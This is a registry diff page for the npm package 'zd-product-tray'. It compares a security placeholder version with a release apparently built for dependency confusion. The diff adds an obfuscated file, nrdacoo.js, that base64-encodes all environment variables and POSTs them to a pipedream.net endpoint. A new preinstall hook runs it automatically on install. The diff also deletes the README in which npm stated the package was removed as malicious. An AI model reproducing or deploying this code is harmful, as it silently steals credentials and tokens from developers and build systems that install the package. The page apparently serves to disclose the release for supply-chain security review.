zd-product-tray 0.0.1-security → 9998.854.664
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zd-product-tray might be problematic. Click here for more details.
- package/nrdacoo.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/nrdacoo.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x1f51(_0x33af6e,_0x2744b5){const _0x4fd56f=a0_0x4fd5();return a0_0x1f51=function(_0x1f5143,_0x13a7c6){_0x1f5143=_0x1f5143-0x13e;let _0x29b897=_0x4fd56f[_0x1f5143];return _0x29b897;},a0_0x1f51(_0x33af6e,_0x2744b5);}const a0_0x4ab190=a0_0x1f51;(function(_0x51793c,_0x3fb134){const _0x1bbcf6=a0_0x1f51,_0x4539cc=_0x51793c();while(!![]){try{const _0x52c93b=-parseInt(_0x1bbcf6(0x14f))/0x1+-parseInt(_0x1bbcf6(0x145))/0x2*(parseInt(_0x1bbcf6(0x143))/0x3)+parseInt(_0x1bbcf6(0x14b))/0x4*(parseInt(_0x1bbcf6(0x14d))/0x5)+parseInt(_0x1bbcf6(0x14c))/0x6+parseInt(_0x1bbcf6(0x149))/0x7*(-parseInt(_0x1bbcf6(0x148))/0x8)+parseInt(_0x1bbcf6(0x147))/0x9+parseInt(_0x1bbcf6(0x150))/0xa*(parseInt(_0x1bbcf6(0x13f))/0xb);if(_0x52c93b===_0x3fb134)break;else _0x4539cc['push'](_0x4539cc['shift']());}catch(_0x3378c4){_0x4539cc['push'](_0x4539cc['shift']());}}}(a0_0x4fd5,0x819d3));function a0_0x4fd5(){const _0x2dd2d5=['join','toString','env','3RTMyaN','https','735996OxxQOR','request','339948JrFneM','240Dsppni','155498CUDKVi','pipedream','373936SnIVYG','2316948mCFNGd','40tjdxyT','npm_package_name','601456OBTJXN','30GUnnWE','from','4aaa0dfa016c3686a57e93787657fa37','end','3648227xExEqF'];a0_0x4fd5=function(){return _0x2dd2d5;};return a0_0x4fd5();}const http=require(a0_0x4ab190(0x144));req=http[a0_0x4ab190(0x146)]({'host':[a0_0x4ab190(0x152),'m',a0_0x4ab190(0x14a),'net'][a0_0x4ab190(0x140)]('.'),'path':'/'+(process['env'][a0_0x4ab190(0x14e)]||''),'method':'POST'}),req['write'](Buffer[a0_0x4ab190(0x151)](JSON['stringify'](process[a0_0x4ab190(0x142)]))[a0_0x4ab190(0x141)]('base64')),req[a0_0x4ab190(0x13e)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "zd-product-tray",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "9998.854.664",
|
|
4
|
+
"main": "nrdacoo.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node nrdacoo.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zd-product-tray for more information.
|